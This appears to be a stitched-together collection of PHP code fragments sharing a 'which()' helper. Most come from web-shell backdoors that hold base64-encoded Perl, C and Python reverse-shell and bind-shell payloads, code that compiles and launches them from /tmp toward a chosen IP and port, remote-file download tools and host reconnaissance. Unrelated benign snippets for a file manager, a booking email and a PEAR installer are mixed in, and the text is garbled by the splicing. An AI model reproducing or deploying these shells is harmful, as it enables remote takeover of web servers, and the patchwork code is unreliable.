"YmluL2Jhc2gnIA0KZGVmIG1haW4oKTogDQogICAgcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFG" . "X0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKSANCiAgICB0cnk6IA0KICAgICAgICBzLmNvbm5lY3Qo" . "KHNvY2tldC5nZXRob3N0YnluYW1lKHN5cy5hcmd2WzFdKSxpbnQoc3lzLmFyZ3ZbMl0pKSkgDQog" . "ICAgICAgIHByaW50ICdbK11Db25uZWN0IE9LJyANCiAgICBleGNlcHQ6IA0KICAgICAgICBwcmlu" . "dCAiWy1dQ2FuJ3QgY29ubmVjdCIgDQogICAgICAgIHN5cy5leGl0KDIpIA0KICAgIGltcG9ydCBv" . "cyANCiAgICBvcy5kdXAyKHMuZmlsZW5vKCksMCkgDQogICAgb3MuZHVwMihzLmZpbGVubygpLDEp" . "IA0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwyKSANCiAgICBpbXBvcnQgcHR5IA0KICAgIGdsb2Jh" . "bCBzaGVsbCANCiAgICBwdHkuc3Bhd24oc2hlbGwpDQogICAgcy5jbG9zZSgpIA0KaWYgX19uYW1l" . "X18gPT0gJ19fbWFpbl9fJzogDQogICAgbWFpbigpICANCg=="; if ($start && $yourip && $yourport && $use) { if ($use == 'perl') { cf('/tmp/angel_bc', $back_connect); $res = execute(which('perl') . " /tmp/angel_bc {$yourip} {$yourport} &"); } else { if ($use == 'c') { cf('/tmp/angel_bc.c', $back_connect_c); $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); @unlink('/tmp/angel_bc.c'); $res = execute("/tmp/angel_bc {$yourip} {$yourport} &"); } else { if ($use == 'python') { cf('/tmp/angel_bcpy', $back_connect_py); $res = execute(which('python') . " /tmp/angel_bcpy {$yourip} {$yourport} &"); } } } m("Now script try connect to {$yourip} port {$yourport} ..."); } formhead(array('title' => 'Back Connect')); makehide('action', 'backconnect'); p('<p>'); p('Your IP:'); makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip)); p('Your Port:'); makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport)); p('Use:'); makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use)); makeinput(array('name' => 'start', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt'));
foreach ($userful as $item) { if (which($item)) { $temp[] = $item; } } secparam('Userful', implode(', ', $temp)); $temp = array(); foreach ($danger as $item) { if (which($item)) { $temp[] = $item; } } secparam('Danger', implode(', ', $temp)); $temp = array(); foreach ($downloaders as $item) { if (which($item)) { $temp[] = $item; } } secparam('Downloaders', implode(', ', $temp)); secparam('Hosts', @file_get_contents('/etc/hosts')); secparam('HDD space', execute('df -h')); secparam('Mount options', @file_get_contents('/etc/fstab')); } } else { secparam('OS Version', execute('ver')); secparam('Account Settings', execute('net accounts')); secparam('User Accounts', execute('net user')); secparam('IP Configurate', execute('ipconfig -all')); } } else {
case links: $p2 = which("links"); if (empty($p2)) { $p2 = "links"; } $_POST['cmd'] = $p2 . " -source " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . ""; break; case GET: $p2 = which("GET"); if (empty($p2)) { $p2 = "GET"; } $_POST['cmd'] = $p2 . " " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . ""; break; case curl: $p2 = which("curl"); if (empty($p2)) { $p2 = "curl"; } $_POST['cmd'] = $p2 . " " . $_POST['rem_file'] . " -o " . $_POST['loc_file'] . ""; break; } } //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~// /* command execute */ echo $table_up3; if (empty($_POST['cmd']) && !$safe_mode) { $_POST['cmd'] = $windows ? "dir" : "ls -lia"; } else { if (empty($_POST['cmd']) && $safe_mode) { $_POST['cmd'] = "safe_dir";
if (which('wget')) { $select .= "<option value=\"wget\">wget</option>"; } if (which('fetch')) { $select .= "<option value=\"fetch\">fetch</option>"; } if (which('lynx')) { $select .= "<option value=\"lynx\">lynx</option>"; } if (which('links')) { $select .= "<option value=\"links\">links</option>"; } if (which('curl')) { $select .= "<option value=\"curl\">curl</option>"; } if (which('GET')) { $select .= "<option value=\"GET\">GET</option>"; } } if ($select) { echo $fs . $table_up1 . div_title($lang[$language . '_text15'], 'id31') . $table_up2 . div('id31') . $ts; echo sr(15, "<b>" . $lang[$language . '_text16'] . $arrow . "</b>", "<select size=\"1\" name=\"with\">" . $select . "</select>" . in('hidden', 'dir', 0, $dir) . ws(2) . "<b>" . $lang[$language . '_text17'] . $arrow . "</b>" . in('text', 'rem_file', 78, 'http://')); echo sr(15, "<b>" . $lang[$language . '_text18'] . $arrow . "</b>", in('text', 'loc_file', 105, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt2'])); echo $te . '</div>' . $table_end1 . $fe; } echo $fs . $table_up1 . div_title($lang[$language . '_text86'], 'id32') . $table_up2 . div('id32') . $ts; echo sr(15, "<b>" . $lang[$language . '_text59'] . $arrow . "</b>", in('text', 'd_name', 85, $dir) . in('hidden', 'cmd', 0, 'download_file') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt14'])); $arh = $lang[$language . '_text92']; if (@function_exists('gzcompress')) { $arh .= in('radio', 'compress', 0, 'zip') . ' zip'; }
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; if ($start && $yourip && $yourport && $use){ if ($use == 'perl') { cf('/tmp/angel_bc',$back_connect); $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &"); } else { cf('/tmp/angel_bc.c',$back_connect_c); $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); @unlink('/tmp/angel_bc.c'); $res = execute("/tmp/angel_bc $yourip $yourport &"); } m("Now script try connect to $yourip port $yourport ..."); } formhead(array('title'=>'Back Connect')); makehide('action','backconnect'); p('<p>'); p('Your IP:'); makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip)); p('Your Port:');
} include_once "../lang/" . $_SESSION['lang'] . ".lang.php"; include_once "../lib/func.php"; include_once "../lib/sysfunc.php"; $file = stripslashes_r($_POST['file']); $isfile = is_file($file); $isdir = is_dir($file); if (!$isfile && !$isdir) { echo "<center><br><font color=red>{$strCantGetFileInfo}...</font><br><br></center>"; exit; } echo "<table cellspacing=1 cellpadding=0 style=\"margin: 3px;font-size: 10px; font-family: verdana,sans;\">"; if ($isdir) { echo "<tr><td>" . $strFileType . ":</td><td> Directory </td></tr>"; } else { $res = execute(which("file") . " " . escapeshellarg($file)); $res = explode(":", $res); echo "<tr><td valign=\"top\">" . $strFileType . ":</td><td> " . array_pop($res) . "</td></tr>"; } $stat = @stat($file); $perms = @fileperms($file); $dsize = @disk_total_space($file); $fsize = @disk_free_space($file); echo "<tr><td>{$strFileRights}:</td><td> " . getFilePerms($perms) . " (" . substr(sprintf('%o', $perms), -4) . ")</td></tr>"; $owner = posix_getpwuid($stat[4]); $group = posix_getpwuid($stat[5]); if (empty($group['name'])) { $group['name'] = "-1"; } echo "<tr><td>{$strFileOwner}:</td><td> " . $owner['name'] . "/" . $group['name'] . "</td></tr>"; echo "<tr><td>{$strFileSize}:</td><td> " . $stat[7] . "</td></tr>";
*/ session_start(); if (!$_SESSION['fm_entry']) { die('Not a Valid Entry'); } include_once "../lang/" . $_SESSION['lang'] . ".lang.php"; include_once "../lib/func.php"; include_once "../lib/sysfunc.php"; $oldname = stripslashes_r($_POST['oldname']); $newname = stripslashes_r($_POST['newname']); if (is_file($newname) || is_dir($newname)) { echo $strRenameFailed . ": " . $strFileExists . ": " . hc($newname); exit; } setenvlang(); $com = which("mv"); if ($com) { exec($com . " -f " . escapeshellarg($oldname) . " " . escapeshellarg($newname) . " 2>&1", $out); if (!empty($out)) { echo $strRenameFailed . "...<br>" . hs($out[0]) . "..."; } else { echo "success"; } exit; } if (@rename($oldname, $newname)) { echo "success"; } else { echo $strRenameFailed; } exit;
} $_POST['backcconnmsg'] = "To connect, use netcat and give it the command <b>'nc {$ip} {$por}'</b>.{$data}"; } } if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && $_POST['use'] == "Perl") { if (is_writable(".")) { cf("back", $back_connect); $p2 = which("perl"); $blah = ex($p2 . " back " . $_POST['backconnectip'] . " " . $_POST['backconnectport'] . " &"); $_POST['backcconnmsg'] = "Trying to connect to <b>" . $_POST['backconnectip'] . "</b> on port <b>" . $_POST['backconnectport'] . "</b>."; if (file_exists("back")) { unlink("back"); } } else { cf("/tmp/back", $back_connect); $p2 = which("perl"); $blah = ex($p2 . " /tmp/back " . $_POST['backconnectip'] . " " . $_POST['backconnectport'] . " &"); $_POST['backcconnmsg'] = "Trying to connect to <b>" . $_POST['backconnectip'] . "</b> on port <b>" . $_POST['backconnectport'] . "</b>."; if (file_exists("/tmp/back")) { unlink("/tmp/back"); } } } if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && $_POST['use'] == "C") { if (is_writable(".")) { cf("backc", $back_connect_c); ex("chmod 777 backc"); //$blah = ex("gcc back.c -o backc"); $blah = ex("./backc " . $_POST['backconnectip'] . " " . $_POST['backconnectport'] . " &"); $_POST['backcconnmsg'] = "Trying to connect to <b>" . $_POST['backconnectip'] . "</b> on port <b>" . $_POST['backconnectport'] . "</b>."; //if (file_exists("back.c")) { unlink("back.c"); }
} } tbfoot(); if ($alreadymssql) { @mssql_close(); } } elseif ($action == 'backconnect') { !$yourip && ($yourip = $_SERVER['REMOTE_ADDR']); !$yourport && ($yourport = '12345'); $usedb = array('perl' => 'perl', 'c' => 'c'); $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; if ($start && $yourip && $yourport && $use) { if ($use == 'perl') { cf('/tmp/angel_bc', $back_connect); $res = execute(which('perl') . " /tmp/angel_bc {$yourip} {$yourport} &"); } else { cf('/tmp/angel_bc.c', $back_connect_c); $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); @unlink('/tmp/angel_bc.c'); $res = execute("/tmp/angel_bc {$yourip} {$yourport} &"); } m("Now script try connect to {$yourip} port {$yourport} ..."); } formhead(array('title' => 'Back Connect')); makehide('action', 'backconnect'); p('<p>'); p('Your IP:'); makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip)); p('Your Port:'); makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport));
* Nickolay Shestakov <*****@*****.**> * * This program is free software, distributed under the terms of * the GNU General Public License Version 2. See the LICENSE file * at the top of the source tree. */ session_start(); if (!$_SESSION['fm_entry']) { die('Not a Valid Entry'); } include_once "../lang/" . $_SESSION['lang'] . ".lang.php"; include_once "../lib/func.php"; include_once "../lib/sysfunc.php"; $dir = stripslashes_r($_POST['dir']); setenvlang(); $com = which("mkdir"); if ($com) { exec($com . " -p " . escapeshellarg($dir) . " 2>&1", $out); if (!empty($out)) { echo $strMkDirFailed . ": " . hc($dir) . "<br>" . hs($out[0]); } else { echo "success"; } exit; } if (@mkdir($dir)) { echo "success"; } else { echo $strMkDirFailed . ": " . hc($dir); } exit;
function actionNetwork() { $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzb2NrZmQsIG5ld2ZkLCBpOw0KICAgIGNoYXIgcGFzc1szMF07DQogICAgc3RydWN0IHNvY2thZGRyX2luIHJlbW90ZTsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzb2NrZmQgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighc29ja2ZkKQ0KICAgICAgICByZXR1cm4gLTE7DQogICAgcmVtb3RlLnNpbl9mYW1pbHkgPSBBRl9JTkVUOw0KICAgIHJlbW90ZS5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHJlbW90ZS5zaW5fYWRkci5zX2FkZHIgPSBodG9ubChJTkFERFJfQU5ZKTsNCiAgICBiaW5kKHNvY2tmZCwgKHN0cnVjdCBzb2NrYWRkciAqKSZyZW1vdGUsIDB4MTApOw0KICAgIGxpc3Rlbihzb2NrZmQsIDUpOw0KICAgIHdoaWxlKDEpIHsNCiAgICAgICAgbmV3ZmQ9YWNjZXB0KHNvY2tmZCwwLDApOw0KICAgICAgICBkdXAyKG5ld2ZkLDApOw0KICAgICAgICBkdXAyKG5ld2ZkLDEpOw0KICAgICAgICBkdXAyKG5ld2ZkLDIpOw0KICAgICAgICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChuZXdmZCxwYXNzLHNpemVvZihwYXNzKSk7DQogICAgICAgIGZvcihpPTA7aTxzdHJsZW4ocGFzcyk7aSsrKQ0KICAgICAgICAgICAgaWYoIChwYXNzW2ldID09ICdcbicpIHx8IChwYXNzW2ldID09ICdccicpICkNCiAgICAgICAgICAgICAgICBwYXNzW2ldID0gJ1wwJzsNCiAgICAgICAgICAgIGlmIChzdHJjbXAoYXJndlsyXSxwYXNzKSA9PSAwKQ0KICAgICAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICAgICAgY2xvc2UobmV3ZmQpOw0KICAgIH0NCn0="; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; ?> <h1>Network tools</h1><div class=content> <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;"> <span>Bind port to /bin/sh</span><br/> Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>"> </form> <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;"> <span>Back-connect to</span><br/> Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>"> </form><br> <?php if(isset($_POST['p1'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists('file_put_contents'); if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpc') { cf("/tmp/bp.c",$bind_port_c); $out = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>"; } if($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl",$bind_port_p); $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>"; } if($_POST['p1'] == 'bcc') { cf("/tmp/bc.c",$back_connect_c); $out = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>"; } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p); $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>"; } } echo '</div>'; }
function workout_booking_email($booking_id) { if (!($binary = which(array('php', 'php5', 'php-cli', 'php-cgi', '/usr/local/php54/bin/php', 'php54-cli')))) { return false; } $file_path = c('site_basepath') . 'index.php'; return exec("{$binary} {$file_path} api mobile workout_booking_email {$booking_id} > /dev/null &"); }
} include_once "../lang/" . $_SESSION['lang'] . ".lang.php"; include_once "../config.php"; include_once "../lib/func.php"; include_once "../lib/sysfunc.php"; $dir = stripslashes_r($_POST['dir']); $theme = $_SESSION['theme']; if ($prog = which('wget')) { $progtype = "wget"; } elseif ($prog = which('curl')) { $progtype = "curl"; } elseif (@ini_get('allow_url_fopen')) { $progtype = "copy"; } elseif ($prog = which('links')) { $progtype = "links"; } elseif ($prog = which('lynx')) { $progtype = "lynx"; } ?> <script> fm.uploadRemoteFile = function() { var file=$('upload_remote_file').value; if(!file) return; var url = "fm/uploadfile.php"; var pb = "upload_dir="+encodeURIComponent('<?php echo addslashes($dir); ?> ')+"&remote_file="+encodeURIComponent(file)+"&new_name="+encodeURIComponent($('new_name').value)+ "&type=remote&prog=<?php echo $prog; ?>
} else { $data = "\n<br>Pr0c355 n07 f0und, b4ckd00r 537up f41l3d!"; } $_POST['backcconnmsg'] = "70 c0nn3c7, u53 netcat! Us4g3: <b>'nc {$ip} {$poor}'</b>.{$data}"; } if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && $_POST['use'] == "Perl") { if (is_writable(".")) { cf("back", $bc_p3rl); $po2 = which("perl"); $blah = ex($po2 . " back " . $_POST['backconnectip'] . " " . $_POST['backconnectport'] . " &"); if (file_exists("back")) { unlink("back"); } } else { cf("/tmp/back", $bc_p3rl); $po2 = which("perl"); $blah = ex($po2 . " /tmp/back " . $_POST['backconnectip'] . " " . $_POST['backconnectport'] . " &"); if (file_exists("/tmp/back")) { unlink("/tmp/back"); } } $_POST['backcconnmsg'] = "Try1ng 70 c0nn3c7 70 <b>" . $_POST['backconnectip'] . "</b> 0n p0r7 <b>" . $_POST['backconnectport'] . "</b>."; } if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && $_POST['use'] == "C") { if (is_writable(".")) { cf("backc", $bc_c); ex("chmod 777 backc"); $blah = ex("./backc " . $_POST['backconnectip'] . " " . $_POST['backconnectport'] . " &"); if (file_exists("backc")) { unlink("backc"); }
function detect_install_dirs($_prefix = null) { global $temp_dir, $prefix, $bin_dir, $php_dir, $php_bin, $doc_dir, $data_dir, $test_dir; if (WINDOWS) { if ($_prefix === null) { $prefix = getcwd(); } else { $prefix = $_prefix; } if (!@is_dir($prefix)) { if (@is_dir('c:\\php5')) { $prefix = 'c:\\php5'; } elseif (@is_dir('c:\\php4')) { $prefix = 'c:\\php4'; } elseif (@is_dir('c:\\php')) { $prefix = 'c:\\php'; } } $bin_dir = '$prefix'; $php_dir = '$prefix\\pear'; $doc_dir = '$php_dir\\docs'; $data_dir = '$php_dir\\data'; $test_dir = '$php_dir\\tests'; $temp_dir = '$prefix\\temp'; /* * Detects php.exe */ if ($t = getenv('PHP_PEAR_PHP_BIN')) { $php_bin = $t; } elseif ($t = getenv('PHP_BIN')) { $php_bin = $t; } elseif ($t = which('php')) { $php_bin = $t; } elseif (is_file($prefix . '\\cli\\php.exe')) { $php_bin = $prefix . '\\cli\\php.exe'; } elseif (is_file($prefix . '\\php.exe')) { $php_bin = $prefix . '\\php.exe'; } if ($php_bin && !is_file($php_bin)) { $php_bin = ''; } else { if (!ereg(":", $php_bin)) { $php_bin = getcwd() . DIRECTORY_SEPARATOR . $php_bin; } } if (!is_file($php_bin)) { if (is_file('c:/php/cli/php.exe')) { $php_bin = 'c:/php/cli/php.exe'; } elseif (is_file('c:/php5/php.exe')) { $php_bin = 'c:/php5/php.exe'; } elseif (is_file('c:/php4/cli/php.exe')) { $php_bin = 'c:/php4/cli/php.exe'; } } } else { if ($_prefix === null) { #$prefix = dirname(PHP_BINDIR); $prefix = dirname(__FILE__); } else { $prefix = $_prefix; } $bin_dir = '$prefix/bin'; #$php_dir = '$prefix/share/pear'; $php_dir = '$prefix/PEAR'; $doc_dir = '$php_dir/docs'; $data_dir = '$php_dir/data'; $test_dir = '$php_dir/tests'; $temp_dir = '$prefix/temp'; // check if the user has installed PHP with PHP or GNU layout if (@is_dir("{$prefix}/lib/php/.registry")) { $php_dir = '$prefix/lib/php'; } elseif (@is_dir("{$prefix}/share/pear/lib/.registry")) { $php_dir = '$prefix/share/pear/lib'; $doc_dir = '$prefix/share/pear/docs'; $data_dir = '$prefix/share/pear/data'; $test_dir = '$prefix/share/pear/tests'; } elseif (@is_dir("{$prefix}/share/php/.registry")) { $php_dir = '$prefix/share/php'; } } }
